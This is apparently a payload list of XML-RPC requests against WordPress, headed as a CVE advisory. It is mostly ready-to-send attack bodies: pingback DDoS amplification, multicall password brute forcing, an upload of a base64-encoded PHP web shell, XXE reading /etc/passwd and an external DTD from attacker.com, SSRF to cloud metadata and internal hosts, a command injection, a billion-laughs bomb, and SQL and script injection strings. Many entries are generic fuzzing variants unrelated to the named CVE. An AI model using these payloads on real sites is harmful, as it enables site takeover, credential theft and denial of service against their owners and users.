# CVE-2026-28517: WordPress XML-RPC Amplification Attack
# Severity: High (CVSS 8.6)
# Affected Versions: WordPress 6.4.0 - 6.4.3
# Description: XML-RPC amplification vulnerability allowing DDoS attacks
# and brute force authentication bypass through system.multicall method
# Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28517

# Basic XML-RPC Endpoint Discovery
/xmlrpc.php
/xmlrpc.php?rsd
/blog/xmlrpc.php
/wordpress/xmlrpc.php
/wp/xmlrpc.php

# XML-RPC Method Enumeration
# POST to /xmlrpc.php with:
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Pingback Amplification Attack
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://attacker.com/</string></value></param>
<param><value><string>http://victim.com/existing-post/</string></value></param>
</params>
</methodCall>

# Multiple Pingback Requests (DDoS Amplification)
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>http://attacker.com/1</string></value>
<value><string>http://victim.com/post-1/</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>pingback.ping</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>http://attacker.com/2</string></value>
<value><string>http://victim.com/post-2/</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# Brute Force Authentication via system.multicall
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>admin</string></value>
<value><string>password1</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
<value>
<struct>
<member>
<name>methodName</name>
<value><string>wp.getUsersBlogs</string></value>
</member>
<member>
<name>params</name>
<value>
<array>
<data>
<value><string>admin</string></value>
<value><string>password2</string></value>
</data>
</array>
</value>
</member>
</struct>
</value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# User Enumeration via XML-RPC
<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>admin</string></value></param>
<param><value><string>test</string></value></param>
</params>
</methodCall>

# Get User Info
<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUser</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
</params>
</methodCall>

# Get Multiple Users
<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUsers</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
</params>
</methodCall>

# Post Creation via XML-RPC
<?xml version="1.0"?>
<methodCall>
<methodName>wp.newPost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>post_title</name>
<value><string>Malicious Post</string></value>
</member>
<member>
<name>post_content</name>
<value><string>&lt;script&gt;alert(1)&lt;/script&gt;</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Post Modification
<?xml version="1.0"?>
<methodCall>
<methodName>wp.editPost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
<param>
<value>
<struct>
<member>
<name>post_content</name>
<value><string>Modified content</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Post Deletion
<?xml version="1.0"?>
<methodCall>
<methodName>wp.deletePost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
</params>
</methodCall>

# Media Upload via XML-RPC
<?xml version="1.0"?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>shell.php</string></value>
</member>
<member>
<name>type</name>
<value><string>image/jpeg</string></value>
</member>
<member>
<name>bits</name>
<value><base64>PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+</base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Comment Spam via XML-RPC
<?xml version="1.0"?>
<methodCall>
<methodName>wp.newComment</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
<param>
<value>
<struct>
<member>
<name>comment_content</name>
<value><string>Spam comment with &lt;a href="http://spam.com"&gt;link&lt;/a&gt;</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Category Manipulation
<?xml version="1.0"?>
<methodCall>
<methodName>wp.newCategory</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>Malicious Category</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Tag Manipulation
<?xml version="1.0"?>
<methodCall>
<methodName>wp.newTerm</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>taxonomy</name>
<value><string>post_tag</string></value>
</member>
<member>
<name>name</name>
<value><string>malicious-tag</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Page Creation
<?xml version="1.0"?>
<methodCall>
<methodName>wp.newPage</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>title</name>
<value><string>Malicious Page</string></value>
</member>
<member>
<name>description</name>
<value><string>&lt;iframe src="http://evil.com"&gt;&lt;/iframe&gt;</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Options Manipulation
<?xml version="1.0"?>
<methodCall>
<methodName>wp.getOptions</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
</params>
</methodCall>

# Set Options
<?xml version="1.0"?>
<methodCall>
<methodName>wp.setOptions</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>blog_public</name>
<value><string>0</string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# XXE (XML External Entity) Attack
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param><value><string>&xxe;</string></value></param>
</params>
</methodCall>

# XXE with External DTD
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Billion Laughs Attack (XML Bomb)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param><value><string>&lol4;</string></value></param>
</params>
</methodCall>

# SSRF via Pingback
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://169.254.169.254/latest/meta-data/</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# SSRF to Internal Network
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://192.168.1.1/admin</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# SSRF to Localhost
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://localhost/admin</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# SSRF with File Protocol
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>file:///etc/passwd</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# Port Scanning via Pingback
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target.com:22</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# Reflected XSS in XML-RPC Error Messages
<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>&lt;script&gt;alert(1)&lt;/script&gt;</string></value></param>
<param><value><string>test</string></value></param>
</params>
</methodCall>

# SQL Injection in XML-RPC Parameters
<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUser</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin' OR '1'='1</string></value></param>
<param><value><string>password</string></value></param>
<param><value><int>1</int></value></param>
</params>
</methodCall>

# Command Injection in XML-RPC
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://attacker.com/`whoami`</string></value></param>
<param><value><string>http://victim.com/post/</string></value></param>
</params>
</methodCall>

# Large Payload DoS
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<!-- Repeat 1000+ times -->
<value><struct><member><name>methodName</name><value><string>pingback.ping</string></value></member></struct></value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# Nested XML DoS
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param>
<value>
<array>
<data>
<value>
<array>
<data>
<value>
<array>
<!-- Deep nesting continues -->
</array>
</value>
</data>
</array>
</value>
</data>
</array>
</value>
</param>
</params>
</methodCall>

# Character Encoding Bypass
<?xml version="1.0" encoding="UTF-7"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
</params>
</methodCall>

# CDATA Section Abuse
<?xml version="1.0"?>
<methodCall>
<methodName>wp.newPost</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>admin</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>post_content</name>
<value><string><![CDATA[<script>alert(1)</script>]]></string></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>

# Namespace Confusion
<?xml version="1.0"?>
<methodCall xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Invalid Method Names
<?xml version="1.0"?>
<methodCall>
<methodName>../../../etc/passwd</methodName>
<params></params>
</methodCall>

# Method Name Injection
<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUsersBlogs'; DROP TABLE wp_users;--</methodName>
<params></params>
</methodCall>

# Null Byte in Method Name
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods%00</methodName>
<params></params>
</methodCall>

# Unicode Bypass
<?xml version="1.0"?>
<methodCall>
<methodName>wp\u002egetUsersBlogs</methodName>
<params></params>
</methodCall>

# Case Variation
<?xml version="1.0"?>
<methodCall>
<methodName>WP.GETUSERSBLOGS</methodName>
<params></params>
</methodCall>

# Multiple XML Declarations
<?xml version="1.0"?>
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Processing Instructions Abuse
<?xml version="1.0"?>
<?php system($_GET['cmd']); ?>
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Comment Injection
<?xml version="1.0"?>
<!-- <?php system($_GET['cmd']); ?> -->
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Attribute Injection
<?xml version="1.0"?>
<methodCall attr="<?php system($_GET['cmd']); ?>">
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

# Mixed Content Attack
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods</methodName>
<params>
<param><value><string>text</string><int>123</int></value></param>
</params>
</methodCall>

# Empty Elements Abuse
<?xml version="1.0"?>
<methodCall>
<methodName></methodName>
<params></params>
</methodCall>

# Whitespace Manipulation
<?xml version="1.0"?>
<methodCall>
<methodName>     system.listMethods     </methodName>
<params></params>
</methodCall>

# Newline Injection
<?xml version="1.0"?>
<methodCall>
<methodName>system.listMethods
</methodName>
<params></params>
</methodCall>

# Tab Injection
<?xml version="1.0"?>
<methodCall>
<methodName>system	listMethods</methodName>
<params></params>
</methodCall>
